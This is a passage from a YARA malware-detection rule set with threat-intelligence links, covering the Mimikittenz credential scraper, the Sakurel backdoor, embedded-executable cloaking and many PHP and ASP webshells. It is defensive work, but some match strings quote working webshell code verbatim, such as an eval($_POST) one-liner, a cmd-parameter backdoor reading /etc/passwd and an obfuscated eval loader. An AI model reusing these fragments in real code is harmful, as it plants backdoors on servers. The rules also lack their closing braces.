           $op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 }   
        
       condition:   
           ( uint16(0) == 0x5a4d and filesize < 900KB and ( $x1 or ( all of ($s*) and all of ($op*) ) ) ) or all of them   
rule sig_5783b35b2eace55a5762df27fcb0b0fb28371b3e {   
   	meta:   
   		description = "Auto-generated rule - file 5783b35b2eace55a5762df27fcb0b0fb28371b3e.codex"   
   		author = "YarGen Rule Generator"   
   		reference = "not set"   
   		date = "2016-07-21"   
   		hash1 = "72513534f2e0f3e77a22023b887df3718c9df70686eb0ae58cbbde2f90f447e4"   
   	strings:   
   		$s1 = "B+P:\\6" fullword ascii   
   		$s2 = "6.666K6S6d6l6}6" fullword ascii   
   		$s3 = "0!0&0+0<0A0F0W0\\0a0n0z0" fullword ascii   
   		$s4 = ";#;);.;:;@;E;Q;W;\\;h;q;v;" fullword ascii   
   		$s5 = "2#2-222F2L2W2\\2b2g2x2~2" fullword ascii   
   		$s6 = "9\"9)90979>9E9L9S9Z9k9}9" fullword ascii   
   		$s7 = "6-747;7B7I7P7W7^7e7l7s7z7" fullword ascii   
   		$s8 = "4\"4'43494>4J4P4U4a4g4l4x4" fullword ascii   
   		$s9 = ":#:(:4:::?:K:T:Y:e:k:p:|:" fullword ascii   
   		$s10 = "WD.hyA" fullword ascii   
   		$s11 = "<\"<)<0<7<><E<L<S<Z<a<h<" fullword ascii   
   		$s12 = "=&=,=1=>=D=I=V=_=d=q=w=|=" fullword ascii   
   		$s13 = "; ;(;0;8;@;H;P;X;`;h;p;{;" fullword ascii   
   		$s14 = "<\"<)<0<7<><E<L<S<Z<a<h<o<v<" fullword ascii   
   		$s15 = "6#6(616;6@6I6S6X6d6n6s6|6" fullword ascii   
   		$s16 = "(%r-c;u" fullword ascii   
   		$s17 = "3%3G3N3U3\\3c3j3q3x3" fullword ascii   
   		$s18 = "7\"767T7[7b7i7p7w7~7" fullword ascii   
   		$s19 = "1 1-1>1C1P1a1f1s1" fullword ascii   
   		$s20 = "8 8&8,8A8M8^8d8i8" fullword ascii   
      
   		$op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */   
   		$op1 = { a1 e0 79 44 00 57 ff 75 1c ff 90 78 01 00 00 83 } /* Opcode */   
   		$op2 = { 3c ee 42 00 c7 84 24 8c } /* Opcode */   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them )   
rule sig_7acb8d6d4c062c3097a7d31df103bc4d018519f9 {   
   	meta:   
   		description = "Auto-generated rule - file 7acb8d6d4c062c3097a7d31df103bc4d018519f9.codex"   
   		author = "YarGen Rule Generator"   
   		reference = "not set"   
   		date = "2016-07-21"   
   		hash1 = "e1607486cbb2d111d5df314fe58948aa0dc5897f56f7fd763c62bb30651380e3"   
   	strings:   
   		$s1 = "5(666Z6c6" fullword ascii   
   		$s2 = "Wlm;y%UD%d" fullword ascii   
   		$s3 = ";1;9;@;G;N;U;\\;c;j;q;x;" fullword ascii   
   		$s4 = "8 8'8.858<8C8J8Q8X8_8f8m8t8" fullword ascii   
   		$s5 = "2 2,282=2B2G2P2U2Z2_2h2s2x2" fullword ascii   
   		$s6 = "4'5.555<5C5J5Q5X5_5f5m5t5{5" fullword ascii   
   		$s7 = "0#0*01080?0F0M0T0[0b0i0p0w0" fullword ascii   
   		$s8 = "6$6,616=6B6G6S6X6]6i6n6s6" fullword ascii   
   		$s9 = "=\"=)=0=7=>=E=L=S=Z=a=h=" fullword ascii   
   		$s10 = "6&6-646;6B6I6P6W6^6e6l6s6z6" fullword ascii   
   		$s11 = "O.QrH@" fullword ascii   
   		$s12 = ">\">/>4>A>F>S>X>e>j>w>|>" fullword ascii   
   		$s13 = "0#0(040=0B0N0T0Y0e0k0p0|0" fullword ascii   
   		$s14 = "5)5/545@5F5K5W5`5e5q5w5|5" fullword ascii   
   		$s15 = "=!=&=3=8=E=N=S=`=e=s=x=}=" fullword ascii   
   		$s16 = ":(:/:6:=:D:K:R:Y:`:g:n:u:|:" fullword ascii   
   		$s17 = "7\"727<7F7M7W7a7k7u7" fullword ascii   
   		$s18 = "2+21262E2K2P2\\2h2m2|2" fullword ascii   
   		$s19 = ";/;5;:;G;V;\\;a;n;};" fullword ascii   
   		$s20 = ";\";-;8;C;N;^;i;t;" fullword ascii   
      
   		$op0 = { ff 44 24 14 8d 47 44 50 a1 08 63 44 00 ff 90 84 } /* Opcode */   
   		$op1 = { 6d 43 00 c7 84 24 10 03 00 00 0c 6d 43 00 c7 84 } /* Opcode */   
   		$op2 = { c7 43 0c 20 02 00 00 89 5d f0 ff 90 f8 } /* Opcode */   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them )   
rule d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9 {   
   	meta:   
   		description = "Auto-generated rule - file d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9.codex"   
   		author = "YarGen Rule Generator"   
   		reference = "not set"   
   		date = "2016-07-21"   
   		hash1 = "d1dc9b2905264da34dc97d6c005810fbcc99be1a6b4b41f883bb179dbcacba6e"   
   	strings:   
   		$s1 = ":&:-:=:J:O:\\:m:r:" fullword ascii   
   		$s2 = "6)6/666;6N6W6^6c6t6y6" fullword ascii   
   		$s3 = "666Q6V6b6g6~6" fullword ascii   
   		$s4 = "0%0,010A0F0K0\\0a0f0w0|0" fullword ascii   
   		$s5 = "6!6(63686E6J6W6\\6i6n6{6" fullword ascii   
   		$s6 = "3 3%33383=3J3R3`3e3o3t3~3" fullword ascii   
   		$s7 = "4 4'40454:4G4M4R4_4e4j4w4" fullword ascii   
   		$s8 = "1#1(141=1B1N1T1Y1e1k1p1|1" fullword ascii   
   		$s9 = "?(?2?<?C?J?Q?X?_?f?m?t?{?" fullword ascii   
   		$s10 = "?#?*?1?8???F?M?T?[?b?i?p?w?" fullword ascii   
   		$s11 = "6)6/646@6F6K6W6]6b6n6w6|6" fullword ascii   
   		$s12 = "4#40454:4G4L4Q4^4c4h4u4z4" fullword ascii   
   		$s13 = "<\"<'<3<8<=<I<N<S<_<d<i<u<z<" fullword ascii   
   		$s14 = ">%>/>9>@>G>N>U>\\>c>j>q>" fullword ascii   
   		$s15 = "WTZDAE" fullword ascii   
   		$s16 = "060>0E0K0P0\\0b0g0v0|0" fullword ascii   
   		$s17 = "4#4-474A4K4U4\\4f4p4z4" fullword ascii   
   		$s18 = "7\"7,767@7J7T7^7h7q7{7" fullword ascii   
   		$s19 = ";\";';4;E;J;W;k;p;};" fullword ascii   
   		$s20 = ";0;;;F;Q;\\;g;r;};" fullword ascii   
      
   		$op0 = { a1 b8 63 44 00 83 c4 14 53 ff 75 14 56 57 ff 90 } /* Opcode */   
   		$op1 = { 8b d8 8b 45 08 8b 40 3a 81 c3 00 10 00 00 03 c3 } /* Opcode */   
   		$op2 = { 5c 2d 44 00 c7 84 24 c0 } /* Opcode */   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them )   
rule sig_2fb404bdcebc7acbeb598f8a2ddbecf48c60b113 {   
   	meta:   
   		description = "Auto-generated rule - file 2fb404bdcebc7acbeb598f8a2ddbecf48c60b113.codex"   
   		author = "YarGen Rule Generator"   
   		reference = "not set"   
   		date = "2016-07-21"   
   		hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"   
   	strings:   
   		$s1 = ":%:0:;:F:Q:\\:p:|:" fullword ascii   
   		$s2 = "6.666>6F6N6V6^6f6n6v6~6" fullword ascii   
   		$s3 = "6!6(6/666=6D6K6R6Y6r6:7" fullword ascii   
   		$s4 = "1t83jL.bjG" fullword ascii   
   		$s5 = "6!61666V6]6p6" fullword ascii   
   		$s6 = "2%2D2P2`2p2|2" fullword ascii   
   		$s7 = "42494@4G4N4U4\\4c4j4q4x4" fullword ascii   
   		$s8 = "9+92999@9G9N9U9\\9c9j9q9x9" fullword ascii   
   		$s9 = "4!4&43484E4J4W4\\4i4n4s4" fullword ascii   
   		$s10 = "5$5+52595@5G5N5U5\\5c5j5q5" fullword ascii   
   		$s11 = "1.252<2C2J2Q2X2_2f2m2t2{2" fullword ascii   
   		$s12 = "8 8%818:8?8K8Q8V8b8h8m8y8" fullword ascii   
   		$s13 = "9'93989=9B9K9P9U9Z9c9n9s9" fullword ascii   
   		$s14 = ":\":':,:8:=:B:R:Z:`:e:v:}:" fullword ascii   
   		$s15 = "=#=(=4=:=?=K=Q=V=b=k=p=|=" fullword ascii   
   		$s16 = "= =*=1=8=?=F=M=T=[=b=i=p=w=~=" fullword ascii   
   		$s17 = "3&3-343;3B3I3P3W3^3e3l3s3z3" fullword ascii   
   		$s18 = ":!:(:/:6:=:I:N:S:`:f:k:x:~:" fullword ascii   
   		$s19 = "cMDkAjy=" fullword ascii   
   		$s20 = "=#=/=4=9=E=J=O=[=`=e=q=v={=" fullword ascii   
      
   		$op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */   
   		$op1 = { 3c ee 42 00 c7 84 24 8c } /* Opcode */   
   		$op2 = { a1 e0 79 44 00 83 c4 0c ff 74 24 1c ff 90 3c 01 } /* Opcode */   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them )   
// https://otx.alienvault.com/pulse/55c11d0d4637f20b68c108c2
// https://otx.alienvault.com/pulse/56048efa4637f21ecf296f8b
// https://otx.alienvault.com/pulse/582b40dead98a7282b2854f5
rule Invoke_mimikittenz {   
   	meta:   
   		description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1"   
   		author = "Florian Roth"   
   		reference = "https://github.com/putterpanda/mimikittenz"   
   		date = "2016-07-19"   
   		score = 90   
   		hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a"   
   	strings:   
   		$x1 = "[mimikittenz.MemProcInspector]" ascii   
      
   		$s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii   
   		$s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii   
   		$s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii   
   		$s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii   
   	condition:   
   		( uint16(0) == 0x7566 and filesize < 60KB and 2 of them ) or $x1   
// https://otx.alienvault.com/pulse/55bb9a424637f238607a9e95
rule Sakurel_backdoor   
   {   
   	meta:   
   		maltype = "Sakurel backdoor"   
       ref = "https://github.com/reed1713"   
   		reference = "http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Sakurel.A#tab=2"   
   		description = "malware creates a process in the temp directory and performs the sysprep UAC bypass method."   
   	strings:   
   		$type="Microsoft-Windows-Security-Auditing"   
   		$eventid="4688"   
   		$data="Windows\\System32\\sysprep\\sysprep.exe" nocase   
      
   		$type1="Microsoft-Windows-Security-Auditing"   
   		$eventid1="4688"   
   		$data1="AppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe" nocase   
   	condition:   
   		all of them   
rule Embedded_EXE_Cloaking : maldoc {   
       meta:   
           description = "Detects an embedded executable in a non-executable file"   
           author = "Florian Roth"   
           date = "2015/02/27"   
           score = 80   
       strings:   
           $noex_png = { 89 50 4E 47 }   
           $noex_pdf = { 25 50 44 46 }   
           $noex_rtf = { 7B 5C 72 74 66 31 }   
           $noex_jpg = { FF D8 FF E0 }   
           $noex_gif = { 47 49 46 38 }   
           $mz  = { 4D 5A }   
           $a1 = "This program cannot be run in DOS mode"   
           $a2 = "This program must be run under Win32"          
       condition:   
           (   
               ( $noex_png at 0 ) or   
               ( $noex_pdf at 0 ) or   
               ( $noex_rtf at 0 ) or   
               ( $noex_jpg at 0 ) or   
               ( $noex_gif at 0 )   
           )   
           and   
           for any i in (1..#mz): ( @a1 < ( @mz[i] + 200 ) or @a2 < ( @mz[i] + 200 ) )   
// https://otx.alienvault.com/pulse/5979fd26f7cda54e5b57bdb6
// https://otx.alienvault.com/pulse/58d3d96c0ca5e3424e736e86
// https://otx.alienvault.com/pulse/5979f558481b4c2692f5f810
// https://otx.alienvault.com/pulse/59771d58481b4c67d4f5f810
// https://otx.alienvault.com/pulse/5979ed91a87db72373caeedb
// https://otx.alienvault.com/pulse/5978b2e00972110fbe362a39
// https://otx.alienvault.com/pulse/5978b1f9a87db72cd5caeeda
// https://otx.alienvault.com/pulse/5979ea54fcdea3380da198fc
// https://otx.alienvault.com/pulse/5979e956481b4c1cc1f5f811
// https://otx.alienvault.com/pulse/5979e8b2481b4c1c5bf5f810
// https://otx.alienvault.com/pulse/5979e791481b4c1b92f5f812
// https://otx.alienvault.com/pulse/5979b6e0481b4c745cf5f810
// https://otx.alienvault.com/pulse/5978b12b0972110e9c362a39
// https://otx.alienvault.com/pulse/591d7a844da2585782eaf2f6
// https://otx.alienvault.com/pulse/5977dddda87db701dccaeee1
rule chinese_spam_echoer : webshell   
   {   
       meta:   
           author      = "Vlad https://github.com/vlad-s"   
           date        = "2016/07/18"   
           description = "Catches chinese PHP spam files (printers)"   
       strings:   
           $a = "set_time_limit(0)"   
           $b = "date_default_timezone_set('PRC');"   
           $c = "$Content_mb;"   
           $d = "/index.php?host="   
       condition:   
           all of them   
rule FSO_s_phpinj {   
   	meta:   
   		description = "Webshells Auto-generated - file phpinj.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "dd39d17e9baca0363cc1c3664e608929"   
   	strings:   
   		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"   
   	condition:   
   		all of them   
rule webshell_webshells_new_php5 {   
   	meta:   
   		description = "Web shells - generated from file php5.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "cf2ab009cbd2576a806bfefb74906fdf"   
   	strings:   
   		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"   
   	condition:   
   		all of them   
rule multiple_php_webshells_2 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"   
   		hash6 = "09609851caa129e40b0d56e90dfc476c"   
   		hash7 = "671cad517edd254352fe7e0c7c981c39"   
   	strings:   
   		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"   
   		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"   
   		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword   
   	condition:   
   		all of them   
rule webshell_Java_Shell {   
   	meta:   
   		description = "Web Shell - file Java Shell.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "36403bc776eb12e8b7cc0eb47c8aac83"   
   	strings:   
   		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword   
   		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword   
   	condition:   
   		1 of them   
rule webshell_PH_Vayv_PH_Vayv : webshell {   
   	meta:   
   		description = "Web Shell - file PH Vayv.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "35fb37f3c806718545d97c6559abd262"   
   	strings:   
   		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"   
   		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"   
   	condition:   
   		1 of them   
rule Debug_dllTest_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file dllTest.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1b9e518aaa62b15079ff6edb412b21e9"   
   	strings:   
   		$s4 = "\\Debug\\dllTest.pdb"   
   		$s5 = "--list the services in the computer"   
   	condition:   
   		all of them   
rule PHP_shell {   
   	meta:   
   		description = "Webshells Auto-generated - file shell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"   
   	strings:   
   		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"   
   		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"   
   	condition:   
   		all of them   
rule BackDooR__fr_ {   
   	meta:   
   		description = "Webshells Auto-generated - file BackDooR (fr).php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a79cac2cf86e073a832aaf29a664f4be"   
   	strings:   
   		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "   
   	condition:   
   		all of them   
rule webshell_Sst_Sheller {   
   	meta:   
   		description = "Web Shell - file Sst-Sheller.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d93c62a0a042252f7531d8632511ca56"   
   	strings:   
   		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"   
   		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"   
   	condition:   
   		all of them   
rule RemExp_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file RemExp.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "aa1d8491f4e2894dbdb91eec1abc2244"   
   	strings:   
   		$s0 = "<title>Remote Explorer</title>"   
   		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"   
   		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"   
   	condition:   
   		2 of them   
rule webshell_asp_Rader {   
   	meta:   
   		description = "Web Shell - file Rader.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "ad1a362e0a24c4475335e3e891a01731"   
   	strings:   
   		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"   
   		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "   
   	condition:   
   		all of them   
rule multiple_webshells_0019 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   	strings:   
   		$s0 = "<b>Dumped! Dump has been writed to "   
   		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"   
   		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"   
   	condition:   
   		1 of them   
rule FSO_s_ntdaddy {   
   	meta:   
   		description = "Webshells Auto-generated - file ntdaddy.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"   
   	strings:   
   		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"   
   	condition:   
   		all of them   
rule simple_backdoor_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "f091d1b9274c881f8e41b2f96e6b9936"   
   	strings:   
   		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword   
   		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"   
   		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword   
   	condition:   
   		2 of them   
rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"   
   		author = "Florian Roth"   
   		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"   
   	strings:   
   		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword   
   		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword   
   		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."   
   		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword   
   		$s15 = "if(empty($_GET['file'])){" fullword   
   		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword   
   	condition:   
   		3 of them   
rule Ajax_PHP_Command_Shell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "93d1a2e13a3368a2472043bd6331afe9"   
   	strings:   
   		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"   
   		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"   
   		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><form enct"   
   	condition:   
   		1 of them   
rule webshell_Ani_Shell {   
   	meta:   
   		description = "Web Shell - file Ani-Shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "889bfc9fbb8ee7832044fc575324d01a"   
   	strings:   
   		$s0 = "$Python_CODE = \"I"   
   		$s6 = "$passwordPrompt = \"\\n================================================="   
   		$s7 = "fputs ($sockfd ,\"\\n==============================================="   
   	condition:   
   		1 of them   
rule Mithril_v1_45_Mithril {   
   	meta:   
   		description = "Webshells Auto-generated - file Mithril.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "f1484f882dc381dde6eaa0b80ef64a07"   
   	strings:   
   		$s2 = "cress.exe"   
   		$s7 = "\\Debug\\Mithril."   
   	condition:   
   		all of them   
rule NT_Addy_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file NT Addy.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "2e0d1bae844c9a8e6e351297d77a1fec"   
   	strings:   
   		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"   
   		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"   
   		$s4 = "RAW D.O.S. COMMAND INTERFACE"   
   	condition:   
   		1 of them   
rule multiple_webshells_0016 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php"   
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"   
   		hash2 = "8023394542cddf8aee5dec6072ed02b5"   
   		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"   
   		hash4 = "817671e1bdc85e04cc3440bbd9288800"   
   	strings:   
   		$s1 = "if(rmdir($_POST['mk_name']))"   
   		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"   
   		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"   
   	condition:   
   		2 of them   
rule dbgiis6cli {   
   	meta:   
   		description = "Webshells Auto-generated - file dbgiis6cli.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "3044dceb632b636563f66fee3aaaf8f3"   
   	strings:   
   		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"   
   		$s5 = "###command:(NO more than 100 bytes!)"   
   	condition:   
   		all of them   
rule WebShell_reader_asp_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - file reader.asp.php.txt"   
   		author = "Florian Roth"   
   		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"   
   	strings:   
   		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"   
   		$s12 = " HACKING " fullword   
   		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "   
   		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"   
   	condition:   
   		3 of them   
rule hidshell_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file hidshell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "c2f3327d60884561970c63ffa09439a4"   
   	strings:   
   		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"   
   	condition:   
   		all of them   
rule Debug_cress {   
   	meta:   
   		description = "Webshells Auto-generated - file cress.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "36a416186fe010574c9be68002a7286a"   
   	strings:   
   		$s0 = "\\Mithril "   
   		$s4 = "Mithril.exe"   
   	condition:   
   		all of them   
rule Webshell_Ayyildiz {   
   	meta:   
   		description = "Detects Webshell - rule generated from from files Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt, Macker's Private PHPShell.php, matamu.txt, myshell.txt, PHP Shell.txt"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"   
   		hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"   
   		hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"   
   		hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"   
   		hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"   
   	strings:   
   		$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii   
   		$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii   
   	condition:   
   		filesize < 112KB and all of them   
rule webshell_webshells_new_radhat {   
   	meta:   
   		description = "Web shells - generated from file radhat.asp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "72cb5ef226834ed791144abaa0acdfd4"   
   	strings:   
   		$s1 = "sod=Array(\"D\",\"7\",\"S"   
   	condition:   
   		all of them   
rule phpshell17_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file phpshell17.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "9a928d741d12ea08a624ee9ed5a8c39d"   
   	strings:   
   		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword   
   		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"   
   		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword   
   	condition:   
   		1 of them   
rule backupsql_php_often_with_c99shell {   
   	meta:   
   		description = "Semi-Auto-generated  - file backupsql.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"   
   	strings:   
   		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."   
   		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"   
   	condition:   
   		all of them   
rule webshell_caidao_shell_ice_2 {   
   	meta:   
   		description = "Web Shell - file ice.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "1d6335247f58e0a5b03e17977888f5f2"   
   	strings:   
   		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword   
   	condition:   
   		all of them   
rule WebShell_php_include_w_shell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file php-include-w-shell.php"   
   		author = "Florian Roth"   
   		hash = "1a7f4868691410830ad954360950e37c582b0292"   
   	strings:   
